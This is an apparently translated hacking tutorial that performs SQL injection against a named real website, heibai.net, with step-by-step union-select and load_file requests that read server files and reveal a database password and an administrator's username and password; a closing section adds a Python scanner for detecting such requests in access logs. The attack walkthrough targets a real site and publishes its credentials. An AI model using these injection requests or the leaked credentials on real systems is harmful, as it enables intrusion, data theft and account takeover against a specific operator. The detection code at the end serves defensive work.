Having said all that, let's now put it to use once in practice. This time the test target is a well-known domestic security site, Heibai Network (黑白网络). People say Heibai has a vulnerability? Let's go and take a look together.

http://www.heibai.net/down/show.php?id=5403%20and%201=1
Displays normally (see Figure 35).

http://www.heibai.net/down/show.php?id=5403%20and%201=2
Displays abnormally (see Figure 36). Good, let's continue:

http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
The result is shown in Figure 37. Note that the program name is no longer displayed in the figure, and the page now carries two warnings:

Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\show.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:\web\heibai\down\global.php on line 578

Whoa, the site's filesystem path has leaked; that is fatal for them! We keep adding columns until we reach
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
at which point the page displays normally again (see Figure 38). Now we change the statement to
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
which displays as in Figure 39. Look at the "introduction" field, which shows 12; we can guess that this column is a string type.

OK, now let's look at some file contents first. D:/web/heibai/down/show.php converted to ASCII codes is
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)
so we open
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
The view-source: prefix means "view the page source"; why we need it will be explained later. It shows the file's source code (see Figure 40). The reason is that show.php contains the line
<META HTTP-EQUIV=REFRESH CONTENT='0;URL=list.php'>
so if we submitted the request directly in the browser it would redirect to list.php. In the source we find the line require ("./include/config.inc.php"); good stuff, that should be the configuration file. OK, continue: d:/web/heibai/down/include/config.inc.php converts to
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
and we enter
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
The result is shown in Figure 41. Its main contents are:

…………………..
ymDown (Yemao download system) is a program that provides download services for websites
// ------------------------- -------- ------------------------- //
// General settings //
// ------------------------- -------- ------------------------- //
// Database information
$dbhost = "localhost"; // database host name
$dbuser = "download"; // database user name
$dbpasswd = "kunstar988"; // database password
$dbname = "download"; // database name
// Cookie name
$cookie_name = "heibai";
// Version number
$version = "1.0.1";
// Table names
$down_table = ymdown;
$down_user_table = ymdown_user;
$down_sort1_table = ymdown_sort1;
$down_sort2_table = ymdown_sort2;

So it turns out they use the Yemao download system, and we now know $dbuser = "download"; (the database user name) and $dbpasswd = "kunstar988"; (the database password), which may come in handy later. The table names are the defaults, and we know that Yemao stores the administrator password in ymdown_user. We continue with
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user
The result is shown in Figure 42. From the field labels we know that the "file size" position holds username and the "platform" position holds password (compare Figure 36), i.e. username=dload, password=6558428. Yemao's admin backend is in the admin directory by default, but I tried for a long time and could not find it, ugh. I wanted to connect to MySQL directly, but found the telnet port was not open. Let's go and look at something else!

http://www.heibai.net/vip/article/login.php
This looks like the member login; let's check it first. d:/web/heibai/vip/article/login.php converts to
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)
and we enter
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19
The result is shown in Figure 43, which includes
require ("./include/global.php");
require ("./include/config.inc.php");
require ("./mainfunction.php");
require ("./function.php");
Naturally we go and look at config.inc.php: d:/web/heibai/vip/article/include/config.inc.php converts to
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
Enter
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
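From the defender's side, every request in this walkthrough leaves a recognisable trace in the web server's access log: the paired 1=1 / 1=2 probe, the numbered union select used to find the column count, and load_file over a char() byte list. The following Python scanner is an added example, not code from the article or from ymDown; the log lines it reads are constructed to match the request shapes above, and it decodes the char() list so an incident responder can see which file the attacker tried to read.

```python
import re
from urllib.parse import unquote_plus, urlparse

# Constructed sample access-log lines (client IPs and timestamps are made up;
# only the query strings mirror the requests shown in the article).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2005:10:00:01 +0800] "GET /down/show.php?id=5403%20and%201=1 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2005:10:00:03 +0800] "GET /down/show.php?id=5403%20and%201=2 HTTP/1.1" 200 1800
203.0.113.7 - - [01/Jan/2005:10:00:09 +0800] "GET /down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19 HTTP/1.1" 200 2300
198.51.100.2 - - [01/Jan/2005:10:01:00 +0800] "GET /down/show.php?id=5403 HTTP/1.1" 200 5120
"""

# Common-log-format prefix: client, ident, user, [timestamp], "METHOD target ..."
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) ')
BOOL_RE = re.compile(r'\band\s+1\s*=\s*([12])\b', re.I)          # and 1=1 / and 1=2 probe
UNION_RE = re.compile(r'\bunion\s+(?:all\s+)?select\b', re.I)     # column-count / data extraction
LOADFILE_RE = re.compile(r'load_file\s*\(\s*char\s*\(([\d\s,]+)\)\s*\)', re.I)

def decode_char_list(arg):
    """Turn the comma-separated byte list inside char(...) back into the path it names."""
    return ''.join(chr(int(n)) for n in arg.split(',') if n.strip())

def analyse_request(raw_target):
    """Return a list of injection findings for one URL-encoded request target ([] if clean)."""
    query = urlparse(unquote_plus(raw_target)).query   # decode %20 etc. before matching
    findings = []
    m = BOOL_RE.search(query)
    if m:
        findings.append('boolean-probe:1=' + m.group(1))
    if UNION_RE.search(query):
        findings.append('union-select')
    m = LOADFILE_RE.search(query)
    if m:
        findings.append('load_file:' + decode_char_list(m.group(1)))
    return findings

def scan_log(text):
    """Return (client, timestamp, path, findings) for every request that matched a pattern."""
    alerts = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        client, ts, target = m.groups()
        findings = analyse_request(target)
        if findings:
            alerts.append((client, ts, urlparse(unquote_plus(target)).path, findings))
    return alerts

if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

A 1=1 request immediately followed by a 1=2 request from the same client is the strongest signal here, since the attacker needs both responses to compare; a single matching line alone may be a false positive.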